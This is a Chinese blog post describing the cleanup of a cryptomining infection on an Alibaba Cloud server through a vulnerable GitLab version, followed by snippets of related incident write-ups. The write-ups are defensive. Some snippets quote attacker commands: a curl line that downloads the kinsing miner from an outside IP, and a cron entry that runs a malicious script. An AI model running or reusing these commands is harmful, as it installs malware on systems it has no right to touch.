阿里云服务器被挖矿程序侵入问题

最新推荐文章于 2025-10-30 22:20:45 发布
原创 最新推荐文章于 2025-10-30 22:20:45 发布 · 1.6k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#服务器 #运维

一、起因

        公司需要自行管理代码,所以搞了个阿里云服务器装Gitlab,装的时候版本是13.9.4(在Gitlab挖矿漏洞的版本内)。一直正常使用,然后半夜突然收到阿里云告警短信,说服务器可能存在挖矿程序,部分端口被禁用。于是白天弄完其他事情后开始处理这个挖矿程序。

二、过程

        之前也有服务器被这样搞过,所以想着处理起来应该也很快,结果,并不顺利,下面展开说

2.1 定位挖矿程序位置

  •  先用top命令查看服务器资源占用情况,发现两个用户是git的exe,把CPU占满了
  •  再用lsof -p [pid]查询程序来源,发现是从100.20.97.83.ro.ovo.sc:https这个地方下载过来的,一查,是国外的ip,挖矿程序在执行完后已被删除
  • 使用su git 进度git用户,使用crontab -l 查看有没有定时任务启动,结果发现也没有,好家伙,没有定时任务,也没有执行程序,那应该是守护进程弄的了。根据某度查询,发现是正在使用的gitlab版本有远程漏洞,所以被钻了空子。
  • 停掉gitlab(gitlab-ctl stop),按照指引升级gitlab版本到无漏洞的版本,这里我选择了13.9.7(Index of /gitlab-ce/yum/el7/ | 清华大学开源软件镜像站 | Tsinghua Open Source Mirror),由于服务器端口被禁用,弄的下载都下不了,只能从其他地方下载安装包,然后传到服务器。
  • 安装升级完成后,top发现还有git用户的进程在运行,全部kill掉,再启动gitlab,就解决掉了挖矿程序问题,后续再观察一段时间,看有没有复发。

 三、其他

        过程中用到了busybox(https://busybox.net/downloads/)这个程序,主要是防止linux基础指令也已经被挖矿程序给修改,导致完全被挖矿程序骗的情形。

参考链接:

git-linux-xll?x11-unix 挖矿病毒问题定位与处理 - 知乎linux x11 挖矿病毒,应急响应:记一次花样贼多的挖矿病毒_weixin_39542093的博客-优快云博客

阿里云服务器挖矿
weixin_44034675的博客
05-31 1846
新增SSH端口——>重启sshd服务——>添加防火墙规则——>尝试新端口登陆——>关闭原先的22端口——>增加ip白名单。dr-xr-x---. 8 root root 4096 3月 19 15:57 ..drwx------ 2 root root 4096 3月 18 14:47 .drwx------. 2 root root 4096 8月 9 2019 .- 删除i属性使文件 /etc/passwd和 /etc/shadow具有相同的属性。控制台会自动断开之前使用端口22产生的连接。
Ubuntu | ERROR: ld.so: object ‘/usr/lib64/libthread.so.1‘ from /etc/ld.so.preload cannot be preloade
我是一块小石头
02-07 4137
错误一览 ERROR: ld.so: object '/usr/lib64/libthread.so.1' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. root@xxx:~# root@xxx:~# ls ERROR: ld.so: object '/usr/lib64/libthread.so.1' from /etc/ld.so.preload cannot be prel
阿里云服务器被恶意脚本攻击的解决过程
hide-on-bush的博客
05-08 6353
1.阿里云服务器被恶意脚本攻击(挖矿脚本),导致cpu被打满,服务器卡顿,根本无法使用 2.使用top查看各进程的内存和cpu使用情况,找到对应耗内存和cpu的进程id 3.原本想使用kill -9 pid 杀掉对应进程,结果杀掉之后,立马自动重新开启了一个进程; 4.使用 ll /proc/pid 查看进程的运行路径,各路径表示信息如下: cwd符号链接的是进程运行目录; exe符号连接就是执行程序的绝对路径; cmdline就是程序运行时输入的命令行命令; environ记录了进程运行时的环境变量; f
避坑指南:Linux 服务器 “被植入挖矿程序” 的进程排查与文件清理方案
最新发布
idhsajkhs的博客
10-30 379
通过以上步骤可彻底清除常见挖矿程序,后续建议定期审计进程与开放端口,最小化服务器暴露面。当服务器CPU异常满载时,可能遭遇挖矿程序入侵。
处理阿里云服务器中的恶意挖矿程序
weixin_43268590的博客
06-24 1458
恶意挖矿程序会在未经用户许可的情况下在用户的设备上运行,占用大量计算资源进行挖矿,这可能会导致设备性能下降、温度升高、甚至硬件损伤。因此,用户应当做到以下措施来尽可能地预防挖矿: 及时更新系统和应用程序的安全补丁; 安装安全软件; 加强用户权限管理; 提升防火墙的安全级别,关闭不需要的服务端口; 监控服务器日志等。
阿里云服务器挖矿怎么办
网站安全专家
02-11 5216
春节刚开始,我们SINE安全,发布了2018年服务器挖矿的整体安全分析报告。该安全报告主要是以我们去年的整一年的安全数据为基础,对这些服务器的被挖矿的整体情况进行了详细的安全分析,为站长以及一些中小企业公司提出了合理的服务器安全防护建议。 在去年的虚拟币市场中,虽然虚拟币经历了暴跌的情况,但是服务器挖矿的情况还是持续性的增长趋势,背后是一些攻击者利用服务器的漏洞以及网站漏洞进行入侵服务器...
阿里云ECS服务器被攻击,植入挖矿程序的处理历程(您的云服务器由于被检测到对外攻击,已阻断该服务器对其它服务器端口(TCP:22)的访问)、ssh远程端口的修改
m0_64422133的博客
10-01 2300
您的云服务器(xxx.xxx.x.xx)由于被检测到对外攻击,已阻断该服务器对其它服务器端口(TCP:22)的访问,阻断预计将在2024-10-02 05:39:24时间内结束,请及时进行安全自查。
阿里云服务器被通知存在“挖矿”行为,请及时整改
ywanju的博客
04-04 1569
挖矿”行为是违f 的,一般如果不是自己操作的话,那就是被别人攻击了,利用漏洞在你的服务器上面安装了木马之类的东西。早晨被通知阿里云服务器存在挖矿行为,请及时整改,不然服务器被收回。
阿里云服务器---排查挖矿病毒
lvxiucai的博客
02-06 4224
1.背景 记录一次排查挖矿病毒的过程,其实都是按照阿里云官方教程操作,其中有些操作命令需要重点记录下,为后面生产环境做铺垫学习。 2.现象 近期测试服务器有黑客通过redis的6379端口入侵,然后阿里云发送报警信息,然后登录控制台发现以下报警信息: 3.恶意文件删除 原先还担心 /etc/sysguard 是不是系统自带的,后来,检查看了下其他机器/etc目录下,都无此文件。遂放心...
记一次排查服务器挖矿记录
weixin_44003119的博客
11-20 2143
背景 服务器是在本地,通过云服务器透传访问的 前面已经出现几次被挖矿,导致模型训练很慢,以前仅仅kill完事 以前用的别人的号,今天发现用我的我账号在搞,有点生气 下面仅记录 找+删 执行文件,为何被侵入还没懂 情况及处理步骤 显卡被占用 输入 watch -d -n 1 nvidia-smi 发现程序将GPU占用100%(正常人写的模型很难一直100%吧,总要跟磁盘、CPU交互,暂停GPU) 查询执行用户 输入 ps -ef | grep 20453 下面是我找到文件后,重新执行,复现的,pi
服务器挖矿病毒排查:从“Xray扫描”到Nacos容器后门
weixin_63775969的博客
08-20 1626
项目结论病毒名称xrays挖矿程序入口恶意 Nacos 镜像传播方式守护脚本 + 容器逃逸根本原因使用了非官方、不可信的镜像教训不要图省事用“别人打包好的”服务镜像!在云计算时代,你的每一个docker run都可能是一次“开盲盒”。你拉下的镜像,可能早就被人动了手脚。所以,永远不要信任未经验证的第三方镜像。
记录阿里云服务器被minerd和kworkerds感染作祟,
逐浪青舟的博客
09-03 7875
2018-09-01周五阿里云云盾通知检测到服务器有异常文件下载,当时没太注意,执行下面操作解决问题(简单针对于minerd处理) 1、执行 top -i命令查看cpu 使用总过高,使用top -l 查看到是minerd作祟, 2、果断ps -ef | grep ‘minerd’查看pid, 3、使用kill -9 程序的pid 杀死掉, 4、到 cd /tmp/下...
记一次被注入挖矿程序kdevtmpfi解决记录
但行好事,莫问前程
02-05 5317
前言 发现自己服务器资源使用异常,cpu使用率100%,内存使用也很多,且有陌生的进程。那很有可能是被入侵植入了挖矿程序 解决问题 遇到这种问题切忌惊慌失措,一般挖矿程序除了占用服务资源不会有其他危害 1. 切断来源 一般被侵入的话,服务器上的计划任务会被修改,会有一个进程一直在检测程序是否存在,如果只kill进程删除文件的话会发现过不了一会就会死灰复燃,所以斩草除根,先把去外界不安全的连接关掉。 被修改的计划任务如curl -o /tmp/kinsing http://45.137.155.5.
我的阿里云服务器发现被中【挖矿程序病毒】 的解决处理
本博客记录了从2014年以来在工作学习中遇到的技术问题、解决方法以及部分个人人生经历、经验等内容。
03-20 2636
但两天后发现又出现了相同的报警,上服务器再看了一下,服务器负载正常, 文件修改上只是定时任务文件被改写,看了一下账户记录, 发现一些我没什么印象的用户,感觉不像是我加的。再就是对定时任务文件添加了一些特殊权限。这有一天有空就上来看看,登录服务器后,一看问题大了,整个服务器的定时任务被改写了,成了乱码,检查一下其它的程序到还正常,不过打开网站发现突然很慢了,不错,是中毒了,门罗币(XMR)挖矿程序。这时基本的文件修改是改正过来了,但是服务器发现有些慢,找到了一个很耗CPU的进程zigw,杀掉了,
阿里云服务器挖矿程序攻击
戴着红领巾走世界
02-08 1031
删除恶意脚本文件,直接rm删除不了,需要修改下文件的属性 cd /etc/ rm -f newinit.sh #查看文件属性 lsattr newinit.sh #修改文件属性 chattr -ia newinit.sh 查看定时任务中是否有任务,如果有就删除了此定时任务 * /30 * * * * sh /etc/newinit.sh >/dev/null 2>&1 直接用crontab -e删除没有权限 ...
解决阿里云服务器被植入挖矿脚本过程
拽着尾巴的鱼儿的博客
06-21 5888
基于学习的便利性,在阿里云服务中购买了云服务器,但是突然被告警提示被挖矿,而且要在一定期限内解决挖矿问题,否则就会被关停服务,本篇对于其处理过程进行一个记录,可能对于挖矿的处理也不全面,欢迎各路大神进行评论交流。以上就是今天要讲的内容,本文仅仅简单记录了处理服务器挖矿的流程,记录的不全面,欢迎各路大神探讨交流。
阿里云服务器遭受挖矿程序的入侵的清理之战
qq_38685242的博客
07-26 2946
最近在阿里云服务器上安装了缓存redis,由于没有设置密码,并且开放了6379端口,遭受了挖矿程序攻击。操作系统为centos7。
阿里云服务器存在恶意挖矿程序
u014203449的博客
03-01 5837
阿里云发了很多短信。 进入服务器发现速度缓慢。 输入 top命令查看cpu利用率,发现被占满。networkservice , sysupdate这两个程序。 netstat -anop 也能查询到很多 networkservice的程序用tcp在运行, 首先kill掉上述进程,但是没有卵用,还是很卡,top命令发现这些程序又启动了。 可以在 /proc/[...
阿里云服务器配置conda
04-01
### 如何在阿里云服务器上配置 Conda #### 1. 安装 Anaconda 或 Miniconda 为了在阿里云服务器上成功配置 Conda,可以先通过 SSH 登录到服务器并下载 Anaconda 或 Miniconda 的安装包。推荐使用 Miniconda,因为它...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值